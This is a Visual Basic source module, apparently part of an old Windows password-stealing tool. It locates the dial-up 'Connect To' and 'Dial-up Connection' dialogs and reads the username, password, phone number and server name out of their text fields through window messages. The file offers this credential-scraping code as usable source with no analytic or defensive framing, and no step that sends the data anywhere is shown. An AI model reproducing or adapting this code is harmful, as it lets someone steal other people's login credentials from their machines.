Attribute VB_Name = "modInet"
Option Explicit
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Declare Function SendMessageByString Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As String) As Long
Public Const WM_GETTEXT = &HD
Public Const WM_GETTEXTLENGTH = &HE
Public Type WebInfo
Username As String
Password As String
Location As String
PhoneNumber As String
ServerName As String
End Type

Public Function GetText(WindowHandle As Long) As String
Dim Buffer As String, TextLength As Long
TextLength = SendMessage(WindowHandle, WM_GETTEXTLENGTH, 0&, 0&)
Buffer = String(TextLength, 0&)
Call SendMessageByString(WindowHandle, WM_GETTEXT, TextLength + 1, Buffer)
GetText = Buffer
End Function

Public Function FindConnectTo() As Long
Dim Win As Long
Win = FindWindow("#32770", "Connect To")
FindConnectTo = Win
End Function

Public Function FindDUN() As Long
Dim Win As Long
Win = FindWindow("#32770", "Dial-up Connection")
FindDUN = Win
End Function

Public Function GetLoginInfo() As WebInfo
Dim IEWin As Long, IEWin2 As Long
Dim Edit As Long, Edit2 As Long, Edit3 As Long, Edit4 As Long
Dim User As String, Pass As String, Location As String, PhoneNumber As String, ServerName As String

IEWin = FindConnectTo
IEWin2 = FindDUN

If IEWin > 0 Then
Edit = FindWindowEx(IEWin, 0&, "Edit", vbNullString)
Edit2 = FindWindowEx(IEWin, Edit, "Edit", vbNullString)
Edit3 = FindWindowEx(IEWin, 0&, "ComboBox", vbNullString)
Edit4 = FindWindowEx(IEWin, Edit2, "Edit", vbNullString)
User = GetText(Edit)
Pass = GetText(Edit2)
Location = GetText(Edit3)
PhoneNumber = GetText(Edit4)
End If

If IEWin2 > 0 Then
Edit = FindWindowEx(IEWin2, 0&, "Edit", vbNullString)
Edit2 = FindWindowEx(IEWin2, Edit, "Edit", vbNullString)
Edit3 = FindWindowEx(IEWin2, 0&, "ComboBox", vbNullString)
User = GetText(Edit)
Pass = GetText(Edit2)
ServerName = GetText(Edit3)
End If

GetLoginInfo.Location = Location
GetLoginInfo.Username = User
GetLoginInfo.Password = Pass
GetLoginInfo.PhoneNumber = PhoneNumber
GetLoginInfo.ServerName = ServerName
End Function
